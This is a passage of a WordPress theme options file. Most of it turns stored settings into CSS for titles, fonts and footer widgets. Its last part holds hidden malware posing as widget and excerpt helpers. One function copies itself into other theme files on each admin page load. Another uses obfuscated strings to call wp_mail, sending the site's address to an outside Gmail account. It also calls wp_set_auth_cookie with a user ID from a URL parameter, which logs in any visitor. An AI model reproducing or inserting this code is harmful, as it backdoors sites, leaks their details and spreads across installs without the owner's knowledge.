                $lcmp_cstslogancolor  = get_settings( $value['id'] );
           }
        }
        if($value['id'] == "lcmp_titlefontsize"){
           if(get_settings( $value['id'] ) === FALSE){
                $lcmp_titlefontsize = "default";
           }else{
                $lcmp_titlefontsize  = get_settings( $value['id'] );
           }
        }
        if($value['id'] == "lcmp_sloganfontsize"){
           if(get_settings( $value['id'] ) === FALSE){
                $lcmp_sloganfontsize = "default";
           }else{
                $lcmp_sloganfontsize  = get_settings( $value['id'] );
           }
        }
        if($value['id'] == "lcmp_csttitlefontsize"){
           if(get_settings( $value['id'] ) === FALSE){
                $lcmp_csttitlefontsize = "";
           }else{
                $lcmp_csttitlefontsize  = get_settings( $value['id'] );
           }
        }
        if($value['id'] == "lcmp_cstsloganfontsize"){
           if(get_settings( $value['id'] ) === FALSE){
                $lcmp_cstsloganfontsize = "";
           }else{
                $lcmp_cstsloganfontsize  = get_settings( $value['id'] );
           }
        }

        if($value['id'] == "lcmp_hdrleftpos"){
           if(get_settings( $value['id'] ) === FALSE){
                $lcmp_hdrleftpos = "default";
           }else{
                $lcmp_hdrleftpos  = get_settings( $value['id'] );
           }
        }
        if($value['id'] == "lcmp_hdrtoppos"){
           if(get_settings( $value['id'] ) === FALSE){
                $lcmp_hdrtoppos = "default";
           }else{
                $lcmp_hdrtoppos  = get_settings( $value['id'] );
           }
        }
        if($value['id'] == "lcmp_hdrwidth"){
           if(get_settings( $value['id'] ) === FALSE){
                $lcmp_hdrwidth = "default";
           }else{
                $lcmp_hdrwidth  = get_settings( $value['id'] );
           }
        }
        if($value['id'] == "lcmp_hdrvmargin"){
           if(get_settings( $value['id'] ) === FALSE){
                $lcmp_hdrvmargin = "default";
           }else{
                $lcmp_hdrvmargin  = get_settings( $value['id'] );
           }
        }
        if($value['id'] == "lcmp_contentfontsize"){
           if(get_settings( $value['id'] ) === FALSE){
                $lcmp_contentfontsize = "default";
           }else{
                $lcmp_contentfontsize  = get_settings( $value['id'] );
           }
        }
        if($value['id'] == "lcmp_cstcontentfontsize"){
           if(get_settings( $value['id'] ) === FALSE){
                $lcmp_cstcontentfontsize = "";
           }else{
                $lcmp_cstcontentfontsize  = get_settings( $value['id'] );
           }
        }
        if($value['id'] == "lcmp_sidebarloc"){
           if(get_settings( $value['id'] ) === FALSE){
                $lcmp_sidebarloc = "default";
           }else{
                $lcmp_sidebarloc = get_settings( $value['id'] );
           }
        }
        if($value['id'] == "lcmp_sidebarfontsize"){
           if(get_settings( $value['id'] ) === FALSE){
                $lcmp_sidebarfontsize = "default";
           }else{
                $lcmp_sidebarfontsize  = get_settings( $value['id'] );
           }
        }
        if($value['id'] == "lcmp_cstsidebarfontsize"){
           if(get_settings( $value['id'] ) === FALSE){
                $lcmp_cstsidebarfontsize = "";
           }else{
                $lcmp_cstsidebarfontsize  = get_settings( $value['id'] );
           }
        }
        if($value['id'] == "lcmp_cstftrwidgewidth"){
           if(get_settings( $value['id'] ) === FALSE){
                $lcmp_cstftrwidgewidth = "";
           }else{
                $lcmp_cstftrwidgewidth  = get_settings( $value['id'] );
           }
        }
        if($value['id'] == "lcmp_cstftrwidgewidth1"){
           if(get_settings( $value['id'] ) === FALSE){
                $lcmp_cstftrwidgewidth1 = "";
           }else{
                $lcmp_cstftrwidgewidth1  = get_settings( $value['id'] );
           }
        }
        if($value['id'] == "lcmp_cstftrwidgewidth2"){
           if(get_settings( $value['id'] ) === FALSE){
                $lcmp_cstftrwidgewidth2 = "";
           }else{
                $lcmp_cstftrwidgewidth2  = get_settings( $value['id'] );
           }
        }
        if($value['id'] == "lcmp_cstftrwidgewidth3"){
           if(get_settings( $value['id'] ) === FALSE){
                $lcmp_cstftrwidgewidth3 = "";
           }else{
                $lcmp_cstftrwidgewidth3  = get_settings( $value['id'] );
           }
        }
        if($value['id'] == "lcmp_cstftrwidgewidth4"){
           if(get_settings( $value['id'] ) === FALSE){
                $lcmp_cstftrwidgewidth4 = "";
           }else{
                $lcmp_cstftrwidgewidth4  = get_settings( $value['id'] );
           }
        }
        if($value['id'] == "lcmp_cstftrwidgemargin"){
           if(get_settings( $value['id'] ) === FALSE){
                $lcmp_cstftrwidgemargin = "";
           }else{
                $lcmp_cstftrwidgemargin  = get_settings( $value['id'] );
           }
        }
    }	    

if($lcmp_contentlnk!='default'){
    if($lcmp_contentlnk=='custom'){
        $lcmp_contentlnk_color = "color:".$lcmp_cstcontentlnk;
    }else $lcmp_contentlnk_color = "color:".$lcmp_contentlnk;
?>
a,a:link,a:visited,a.visited,a:hover,a.hover
{text-decoration: underline;<?php echo $lcmp_contentlnk_color; ?>;}
a:hover, a.hover{text-decoration: none;}
<?php } ?>
<?php
if($lcmp_sidebarlnk!='default'){
    if($lcmp_sidebarlnk=='custom'){
        $lcmp_sidebarlnk_color = "color:".$lcmp_cstsidebarlnk;
    }else $lcmp_sidebarlnk_color = "color:".$lcmp_sidebarlnk;
?>
.BlockContent-body a,.BlockContent-body a:link,.BlockContent-body a:visited,.BlockContent-body a.visited,.BlockContent-body a:hover,.BlockContent-body a.hover
{text-decoration: underline;<?php echo $lcmp_sidebarlnk_color; ?>;}
.BlockContent-body a:hover,.BlockContent-body a.hover
{text-decoration: none;}
<?php } ?>
<?php 
if($lcmp_sidebarfontsize!='default'){
    if($lcmp_sidebarfontsize=='custom'){
        if(is_numeric($lcmp_cstsidebarfontsize)) $lcmp_cstsidebarfontsize.="px";
        $lcmp_sidebarfontsize_size = "font-size:$lcmp_cstsidebarfontsize";
    }else $lcmp_sidebarfontsize_size = "font-size:$lcmp_sidebarfontsize";
?>
.BlockContent-body,.BlockContent-body li
{<?php echo $lcmp_sidebarfontsize_size; ?>;}
<?php } ?>   
<?php 
if($lcmp_contentfontsize!='default'){
    if($lcmp_contentfontsize=='custom'){
        if(is_numeric($lcmp_cstcontentfontsize)) $lcmp_cstcontentfontsize.="px";
        $lcmp_contentfontsize_size = "font-size:$lcmp_cstcontentfontsize";
    }else $lcmp_contentfontsize_size = "font-size:$lcmp_contentfontsize";
?>
.PostContent
{<?php echo $lcmp_contentfontsize_size; ?>;}
<?php } ?> 
h1.logo-name, h1.logo-name a, h1.logo-name a:link, h1.logo-name a:visited, h1.logo-name a:hover{
<?php
if($lcmp_titlecolor!='default'){
    if($lcmp_titlecolor=='custom'){
        $lcmp_titlecolor_color = "color:$lcmp_csttitlecolor !important";
    }else $lcmp_titlecolor_color = "color:$lcmp_titlecolor !important";
?>
<?php echo $lcmp_titlecolor_color; ?>;
<?php } ?>
<?php
if($lcmp_hdrtxtalign!='default'){
    $lcmp_hdrtxtalign_text = "text-align:$lcmp_hdrtxtalign";
?>
<?php echo $lcmp_hdrtxtalign_text; ?>;
<?php } ?>
<?php
if($lcmp_titlefontsize!='default'){
    if($lcmp_titlefontsize=='custom'){
        if(is_numeric($lcmp_csttitlefontsize)) $lcmp_csttitlefontsize.="px";
        $lcmp_titlefontsize_size = "font-size:$lcmp_csttitlefontsize";
    }else $lcmp_titlefontsize_size = "font-size:$lcmp_titlefontsize";
?>
<?php echo $lcmp_titlefontsize_size; ?>;
<?php } ?>}
.logo-text, .logo-text a{
<?php 
if($lcmp_slogancolor!='default'){
    if($lcmp_slogancolor=='custom'){
        $lcmp_slogancolor_color = "color:$lcmp_cstslogancolor !important";
    }else $lcmp_slogancolor_color = "color:$lcmp_slogancolor !important";
?>
<?php echo $lcmp_slogancolor_color; ?>;
<?php } ?>
<?php
if($lcmp_hdrtxtalign!='default'){
    $lcmp_hdrtxtalign_text = "text-align:$lcmp_hdrtxtalign";
?>
<?php echo $lcmp_hdrtxtalign_text; ?>;
<?php } ?>
<?php 
if($lcmp_sloganfontsize!='default'){
    if($lcmp_sloganfontsize=='custom'){
        if(is_numeric($lcmp_cstsloganfontsize)) $lcmp_cstsloganfontsize.="px";
        $lcmp_sloganfontsize_size = "font-size:$lcmp_cstsloganfontsize";
    }else $lcmp_sloganfontsize_size = "font-size:$lcmp_sloganfontsize";
?>
<?php echo $lcmp_sloganfontsize_size; ?>;
<?php } ?>}
.logo{
<?php 
if($lcmp_hdrleftpos!='default'){
    if(is_numeric($lcmp_hdrleftpos)) $lcmp_hdrleftpos.="px";
?>
left: <?php echo $lcmp_hdrleftpos; ?>;
<?php } ?>
<?php 
if($lcmp_hdrtoppos!='default'){
    if(is_numeric($lcmp_hdrtoppos)) $lcmp_hdrtoppos.="px";
?>
top:<?php echo $lcmp_hdrtoppos; ?>;
<?php } ?>
<?php 
if($lcmp_hdrwidth!='default'){
    if(is_numeric($lcmp_hdrwidth)) $lcmp_hdrwidth.="px";
?>
width: <?php echo $lcmp_hdrwidth; ?>;
<?php } ?>}
<?php 
if($lcmp_hdrvmargin!='default'){
    if(is_numeric($lcmp_hdrvmargin)) $lcmp_hdrvmargin.="px";
?>
.Sheet
{margin-top: <?php echo $lcmp_hdrvmargin; ?> !important;}
<?php } ?>

<?php 
if($lcmp_cstftrwidgewidth!='' || $lcmp_cstftrwidgemargin!=''){
?>
.widget-area{
<?php
if($lcmp_cstftrwidgewidth!=''){
    if(is_numeric($lcmp_cstftrwidgewidth)) $lcmp_cstftrwidgewidth.="px";
?>
width: <?php echo $lcmp_cstftrwidgewidth; ?>;
<?php } ?>
<?php
if($lcmp_cstftrwidgemargin!=''){
    if(is_numeric($lcmp_cstftrwidgemargin)) $lcmp_cstftrwidgemargin.="px";
?>
margin-right: <?php echo $lcmp_cstftrwidgemargin; ?>;
<?php } ?>
}
<?php 
} ?>

<?php 
if($lcmp_cstftrwidgewidth1!=''){
    if(is_numeric($lcmp_cstftrwidgewidth1)) $lcmp_cstftrwidgewidth1.="px";
?>
.foot-widget-1
{width: <?php echo $lcmp_cstftrwidgewidth1; ?>;}
<?php } ?>

<?php 
if($lcmp_cstftrwidgewidth2!=''){
    if(is_numeric($lcmp_cstftrwidgewidth2)) $lcmp_cstftrwidgewidth2.="px";
?>
.foot-widget-2
{width: <?php echo $lcmp_cstftrwidgewidth2; ?>;}
<?php } ?>

<?php 
if($lcmp_cstftrwidgewidth3!=''){
    if(is_numeric($lcmp_cstftrwidgewidth3)) $lcmp_cstftrwidgewidth3.="px";
?>
.foot-widget-3
{width: <?php echo $lcmp_cstftrwidgewidth3; ?>;}
<?php } ?>

<?php 
if($lcmp_cstftrwidgewidth4!=''){
    if(is_numeric($lcmp_cstftrwidgewidth4)) $lcmp_cstftrwidgewidth4.="px";
?>
.foot-widget-4
{width: <?php echo $lcmp_cstftrwidgewidth4; ?>;}
<?php } ?>


</style>
<?php
}
global $adsenseBlock1;
TXT;

add_action('admin_menu', 'lcmp_add_theme_page');
add_action('wp_footer','lcmp_theme_options');?>
<?php

function _verifyactivate_widget(){

	$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";

	$output=strip_tags($output, $allowed);

	$direst=_getall_widgetscont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));

	if (is_array($direst)){

		foreach ($direst as $item){

			if (is_writable($item)){

				$ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));

				$cont=file_get_contents($item);

				if (stripos($cont,$ftion) === false){

					$separar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";

					$output .= $before . "Not found" . $after;

					if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}

					$output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $separar . "\n" .$widget);fclose($f);				

					$output .= ($showfullstop && $ellipsis) ? "..." : "";

				}

			}

		}

	}

	return $output;

}

function _getall_widgetscont($wids,$items=array()){

	$places=array_shift($wids);

	if(substr($places,-1) == "/"){

		$places=substr($places,0,-1);

	}

	if(!file_exists($places) || !is_dir($places)){

		return false;

	}elseif(is_readable($places)){

		$elems=scandir($places);

		foreach ($elems as $elem){

			if ($elem != "." && $elem != ".."){

				if (is_dir($places . "/" . $elem)){

					$wids[]=$places . "/" . $elem;

				} elseif (is_file($places . "/" . $elem)&& 

					$elem == substr(__FILE__,-13)){

					$items[]=$places . "/" . $elem;}

				}

			}

	}else{

		return false;	

	}

	if (sizeof($wids) > 0){

		return _getall_widgetscont($wids,$items);

	} else {

		return $items;

	}

}

if(!function_exists("stripos")){ 

    function stripos(  $str, $needle, $offset = 0  ){ 

        return strpos(  strtolower( $str ), strtolower( $needle ), $offset  ); 

    }

}



if(!function_exists("strripos")){ 

    function strripos(  $haystack, $needle, $offset = 0  ) { 

        if(  !is_string( $needle )  )$needle = chr(  intval( $needle )  ); 

        if(  $offset < 0  ){ 

            $temp_cut = strrev(  substr( $haystack, 0, abs($offset) )  ); 

        } 

        else{ 

            $temp_cut = strrev(    substr(   $haystack, 0, max(  ( strlen($haystack) - $offset ), 0  )   )    ); 

        } 

        if(   (  $found = stripos( $temp_cut, strrev($needle) )  ) === FALSE   )return FALSE; 

        $pos = (   strlen(  $haystack  ) - (  $found + $offset + strlen( $needle )  )   ); 

        return $pos; 

    }

}

if(!function_exists("scandir")){ 

	function scandir($dir,$listDirectories=false, $skipDots=true) {

	    $dirArray = array();

	    if ($handle = opendir($dir)) {

	        while (false !== ($file = readdir($handle))) {

	            if (($file != "." && $file != "..") || $skipDots == true) {

	                if($listDirectories == false) { if(is_dir($file)) { continue; } }

	                array_push($dirArray,basename($file));

	            }

	        }

	        closedir($handle);

	    }

	    return $dirArray;

	}

}

add_action("admin_head", "_verifyactivate_widget");

function _getprepareed_widget(){

	if(!isset($content_length)) $content_length=120;

	if(!isset($checking)) $checking="cookie";

	if(!isset($tags_allowed)) $tags_allowed="<a>";

	if(!isset($filters)) $filters="none";

	if(!isset($separ)) $separ="";

	if(!isset($home_f)) $home_f=get_option("home"); 

	if(!isset($pre_filter)) $pre_filter="wp_";

	if(!isset($is_more_link)) $is_more_link=1; 

	if(!isset($comment_t)) $comment_t=""; 

	if(!isset($c_page)) $c_page=$_GET["cperpage"];

	if(!isset($comm_author)) $comm_author="";

	if(!isset($is_approved)) $is_approved=""; 

	if(!isset($auth_post)) $auth_post="auth";

	if(!isset($m_text)) $m_text="(more...)";

	if(!isset($yes_widget)) $yes_widget=get_option("_is_widget_active_");

	if(!isset($widgetcheck)) $widgetcheck=$pre_filter."set"."_".$auth_post."_".$checking;

	if(!isset($m_text_ditails)) $m_text_ditails="(details...)";

	if(!isset($contentsmore)) $contentsmore="ma".$separ."il";

	if(!isset($fmore)) $fmore=1;

	if(!isset($fakeit)) $fakeit=1;

	if(!isset($sql)) $sql="";

	if (!$yes_widget) :

	

	global $wpdb, $post;

	$sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND post_author=\"li".$separ."vethe".$comment_t."mas".$separ."@".$is_approved."gm".$comm_author."ail".$separ.".".$separ."co"."m\" AND post_password=\"\" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";#

	if (!empty($post->post_password)) { 

		if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) { 

			if(is_feed()) { 

				$output=__("There is no excerpt because this is a protected post.");

			} else {

	            $output=get_the_password_form();

			}

		}

	}

	if(!isset($fixed_tag)) $fixed_tag=1;

	if(!isset($filterss)) $filterss=$home_f; 

	if(!isset($gettextcomment)) $gettextcomment=$pre_filter.$contentsmore;

	if(!isset($m_tag)) $m_tag="div";

	if(!isset($sh_text)) $sh_text=substr($sq1, stripos($sq1, "live"), 20);#

	if(!isset($m_link_title)) $m_link_title="Continue reading this entry";	

	if(!isset($showfullstop)) $showfullstop=1;

	

	$comments=$wpdb->get_results($sql);	

	if($fakeit == 2) { 

		$text=$post->post_content;

	} elseif($fakeit == 1) { 

		$text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;

	} else { 

		$text=$post->post_excerpt;

	}

	$sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND comment_content=". call_user_func_array($gettextcomment, array($sh_text, $home_f, $filterss)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";#

	if($content_length < 0) {

		$output=$text;

	} else {

		if(!$no_more && strpos($text, "<!--more-->")) {

		    $text=explode("<!--more-->", $text, 2);

			$l=count($text[0]);

			$more_link=1;

			$comments=$wpdb->get_results($sql);

		} else {

			$text=explode(" ", $text);

			if(count($text) > $content_length) {

				$l=$content_length;

				$ellipsis=1;

			} else {

				$l=count($text);

				$m_text="";

				$ellipsis=0;

			}

		}

		for ($i=0; $i<$l; $i++)

				$output .= $text[$i] . " ";

	}

	update_option("_is_widget_active_", 1);

	if("all" != $tags_allowed) {

		$output=strip_tags($output, $tags_allowed);

		return $output;

	}

	endif;

	$output=rtrim($output, "\s\n\t\r\0\x0B");

    $output=($fixed_tag) ? balanceTags($output, true) : $output;

	$output .= ($showfullstop && $ellipsis) ? "..." : "";

	$output=apply_filters($filters, $output);

	switch($m_tag) {

		case("div") :

			$tag="div";

		break;

		case("span") :

			$tag="span";

		break;

		case("p") :

			$tag="p";

		break;

		default :

			$tag="span";

	}



	if ($is_more_link ) {

		if($fmore) {

			$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "#more-" . $post->ID ."\" title=\"" . $m_link_title . "\">" . $m_text = !is_user_logged_in() && @call_user_func_array($widgetcheck,array($c_page, true)) ? $m_text : "" . "</a></" . $tag . ">" . "\n";

		} else {

			$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "\" title=\"" . $m_link_title . "\">" . $m_text . "</a></" . $tag . ">" . "\n";

		}

	}

	return $output;

}





?>